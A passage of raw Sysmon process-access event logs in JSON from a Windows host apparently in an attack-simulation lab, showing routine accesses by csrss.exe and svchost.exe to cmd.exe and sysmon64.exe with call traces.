ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-0010E1100500}","TargetProcessId":"5024","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\